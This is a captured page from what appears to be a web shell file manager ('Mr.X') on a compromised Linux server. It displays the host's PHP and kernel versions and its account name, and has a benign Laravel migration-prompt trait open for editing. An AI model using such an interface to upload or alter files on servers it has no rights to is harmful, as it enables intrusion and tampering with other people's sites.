🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:AskToRunMigrations.php
<?php namespace Spatie\LaravelPackageTools\Commands\Concerns; trait AskToRunMigrations { protected bool $askToRunMigrations = false; public function askToRunMigrations(): self { $this->askToRunMigrations = true; return $this; } protected function processAskToRunMigrations(): self { if ($this->askToRunMigrations) { if ($this->confirm('Would you like to run the migrations now?')) { $this->comment('Running migrations...'); $this->call('migrate'); } } return $this; } }
Save Changes
Cancel
Create New File
Create New Folder